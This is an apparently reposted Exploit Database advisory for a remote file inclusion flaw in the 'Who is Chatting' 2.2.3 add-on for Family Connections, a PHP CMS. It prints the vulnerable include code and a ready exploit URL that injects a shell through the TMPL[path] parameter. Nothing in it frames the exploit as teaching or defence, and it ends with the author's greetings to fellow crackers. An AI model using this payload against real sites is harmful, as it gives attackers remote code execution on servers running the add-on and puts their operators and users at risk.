Family Connections Who is Chatting AddOn – Remote File Inclusion

• Exploit Database
• 69 阅读

• 作者： lumut--
  日期： 2010-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14186/

• *=======================================================
  Who is Chatting 2.2.3 Remote File Include Vulnerability
  =======================================================
  
  # Author : lumut--
  # Script Details : http://www.familycms.com/downloads/details.php?file=50
  # Bugs :
  
  <?
  $chat_inc = $TMPL[\'path\'] . \"inc/chatting_inc.php\";
  include_once ($chat_inc);
  ?>
  
  # Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]
  
  # Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
  manadocoding*
  

  Python

  Copy